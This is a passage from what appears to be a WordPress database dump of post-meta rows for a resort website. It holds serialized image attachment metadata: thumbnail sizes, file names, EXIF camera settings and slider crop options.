:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4045-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4045-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4045-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4045-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4045-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4045-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4045-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4045-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4045-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4045-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1479463100\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"18.8\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:15:\"0.0108695652174\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(930,452,'_wp_attached_file','2017/01/IMAG0458-1.jpg'),(931,452,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:872;s:6:\"height\";i:1058;s:4:\"file\";s:22:\"2017/01/IMAG0458-1.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-247x300.jpg\";s:5:\"width\";i:247;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-768x932.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:932;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"IMAG0458-1-844x1024.jpg\";s:5:\"width\";i:844;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-872x380.jpg\";s:5:\"width\";i:872;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-872x480.jpg\";s:5:\"width\";i:872;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:22:\"IMAG0458-1-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:7:\"ADR6350\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1400408441\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(932,453,'_wp_attached_file','2017/01/DSCN2617.jpg'),(933,453,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2017/01/DSCN2617.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2617-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2617-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2617-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2617-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2617-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2617-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2617-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2617-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2617-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2617-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2617-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2617-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"6.3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1433379647\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00322580645161\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(934,453,'ml-slider_type','image'),(935,453,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2017/01/DSCN2617-700x300.jpg\";s:4:\"file\";s:20:\"DSCN2617-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(936,447,'ml-slider_type','image'),(937,447,'_wp_attachment_backup_sizes','a:1:{s:15:\"resized-700x300\";a:5:{s:4:\"path\";s:93:\"/home/expcom5/public_html/ashbyresort.com/dir/wp-content/uploads/2017/01/DSCN3227-700x300.jpg\";s:4:\"file\";s:20:\"DSCN3227-700x300.jpg\";s:5:\"width\";i:700;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}'),(938,453,'ml-slider_crop_position','center-center'),(939,453,'_wp_attachment_image_alt',''),(940,447,'ml-slider_crop_position','right-bottom'),(941,447,'_wp_attachment_image_alt',''),(942,37,'_yoast_wpseo_content_score','60'),(947,459,'_wp_attached_file','2016/03/DSCN2766.jpg'),(948,459,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2766.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2766-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2766-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2766-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2766-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2766-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2766-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2766-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2766-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2766-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2766-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2766-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2766-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1437694503\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"10.3\";s:3:\"iso\";s:3:\"220\";s:13:\"shutter_speed\";s:15:\"0.0333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(949,460,'_wp_attached_file','2016/03/DSCN2771.jpg'),(950,460,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2016/03/DSCN2771.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2771-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN2771-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN2771-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN2771-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2771-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN2771-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN2771-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN2771-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN2771-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN2771-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN2771-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN2771-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1437694772\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"9.2\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0520833333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(951,461,'_wp_attached_file','2016/03/DSCN4142.jpg'),(952,461,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4142.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4142-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4142-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4142-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4142-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4142-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4142-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4142-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4142-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4142-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4142-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4142-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4142-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1484471414\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"120\";s:3:\"iso\";s:3:\"160\";s:13:\"shutter_speed\";s:16:\"0.00850340136054\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(953,462,'_wp_attached_file','2016/03/DSCN4144.jpg'),(954,462,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4144.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4144-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4144-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4144-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4144-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4144-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4144-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4144-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4144-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4144-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4144-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4144-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4144-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096209\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:15:\"0.0709219858156\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(955,463,'_wp_attached_file','2016/03/DSCN4146.jpg'),(956,463,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4146.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4146-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4146-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4146-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4146-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4146-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4146-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4146-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4146-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4146-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4146-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4146-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4146-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P100\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1485096241\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.6\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:14:\"0.175438596491\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(957,464,'_wp_attached_file','2016/03/DSCN4149.jpg'),(958,464,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3648;s:6:\"height\";i:2736;s:4:\"file\";s:20:\"2016/03/DSCN4149.jpg\";s:5:\"sizes\";a:12:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4149-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"DSCN4149-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"DSCN4149-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"DSCN4149-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:24:\"vantage-thumbnail-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4149-330x174.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:174;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"vantage-thumbnail-no-sidebar-mobile\";a:4:{s:4:\"file\";s:20:\"DSCN4149-330x116.jpg\";s:5:\"width\";i:330;s:6:\"height\";i:116;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:20:\"DSCN4149-720x380.jpg\";s:5:\"width\";i:720;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"vantage-thumbnail-no-sidebar\";a:4:{s:4:\"file\";s:21:\"DSCN4149-1080x380.jpg\";s:5:\"width\";i:1080;s:6:\"height\";i:380;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"vantage-slide\";a:4:{s:4:\"file\";s:20:\"DSCN4149-960x480.jpg\";s:5:\"width\";i:960;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"vantage-carousel\";a:4:{s:4:\"file\";s:20:\"DSCN4149-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:17:\"vantage-grid-loop\";a:4:{s:4:\"file\";s:20:\"DSCN4149-436x272.jpg\";s:5:\"width\";i:436;s:6:\"height\";i:272;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sow-carousel-default\";a:4:{s:4:\"file\";s:20:\"DSCN4149-272x182.jpg\";s:5:\"width\";i:272;s:6:\"height\";i:182;s:9:\